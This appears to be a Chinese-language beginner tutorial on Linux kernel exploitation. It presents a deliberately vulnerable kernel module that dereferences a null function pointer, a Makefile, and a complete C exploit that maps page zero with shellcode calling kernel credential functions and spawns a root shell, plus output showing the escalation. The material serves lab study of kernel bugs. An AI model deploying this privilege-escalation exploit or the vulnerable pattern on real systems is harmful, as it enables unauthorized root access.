[kernel pwn 入门] 1. 空指针

前言

网上相关的资料很多了. 但是几乎都是基于 linux 2.6 的[1]. 感觉太老了, 所以我在配置环境的时候选择了 4.4.117 . 虽然原理都一样, 但是因为linux内核提供的api有所不同, 所以无论是模块代码还是exp都和基于 2.6 的内核可能有所不同. 在此分享一下.

这种利用方式的原理参考[1]. 不再多说. 直接贴 ko 代码和 exp

ko代码

linux 2.26 中用到的 create_proc_entry 函数在 linux 3.10 之后已经被抛弃了. 替换为proc_create_data函数[2]. 代码基于 [3] 中示例代码修改得到.

#include   
#include   
#include   
#include   
#include   

MODULE_LICENSE("GPL");  

void (*myfunc_ptr)(void);
int vuln_write(struct file *file,const char *buf,unsigned long len){
    (*myfunc_ptr)();
    return 1;
}

static const struct file_operations dl_file_ops = {
    .owner = THIS_MODULE,      
    .write = vuln_write,
};  

static int __init test_module_init(void)  {  
    proc_create_data("test", 0666, NULL, &dl_file_ops, NULL);
    return 0;  
}  

static void __exit test_module_exit(void)  
{  
    printk("[test]: module exit\\n");
    remove_proc_entry("test", NULL);
}  
module_init(test_module_init);  
module_exit(test_module_exit);

Makefile:

obj-m += pwn.o

KDIR="/home/pu1p/kernel_pwn/1_env_setup/linux-4.4.117/"

mod:
    make -C $(KDIR) M=$(PWD) modules
exp:
    gcc --static -O0 exp.c -o exp
poc:
    gcc --static -O0 poc.c -o poc
clean:
    make -C $(KDIR) M=$(PWD) clean
    rm exp, poc

exp.c

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void die(char *msg){
        puts(msg);
        exit(-1);
}
// asm('xor rdi, rdi;xor rax, rax; mov rbx, 0xffffffff810439b0;call rbx;mov rdi, rax;mov rbx, 0xffffffff810437b0; call rbx;ret;')
char payload[] = "H1\\xffH1\\xc0H\\xc7\\xc3\\xb0\\x39\\x04\\x81\\xff\\xd3H\\x89\\xc7H\\xc7\\xc3\\xb0\\x37\\x04\\x81\\xff\\xd3\\xc3";
// char payload[] = "\\xb09";
int main(){
    mmap(0, 4096,PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS ,-1, 0);
    memcpy(0, payload, sizeof(payload));
    int fd = open("/proc/test", O_WRONLY);
    if (fd < 0)
        die("open file error");
    if (write(fd, "pu1p", 4) <= 0)
        die("write error");
    system("/bin/sh");//get root shell
    return 0;
}

效果如下

/pwn $ id                                          
uid=1000(user) gid=1000(user) groups=1000(user)    
/pwn $ /pwn/exp                                    
/bin/sh: can't access tty; job control turned off  
/pwn # id                                          
uid=0(root) gid=0(root)                            
/pwn #

参考

[1] https://blog.csdn.net/panhewu9919/article/details/99441712

[2] https://stackoverflow.com/questions/25746461/error-implicit-declaration-of-function-create-proc-read-entry-werror-implic

[3] http://www.embeddedlinux.org.cn/emb-linux/file-system/201703/27-6340.html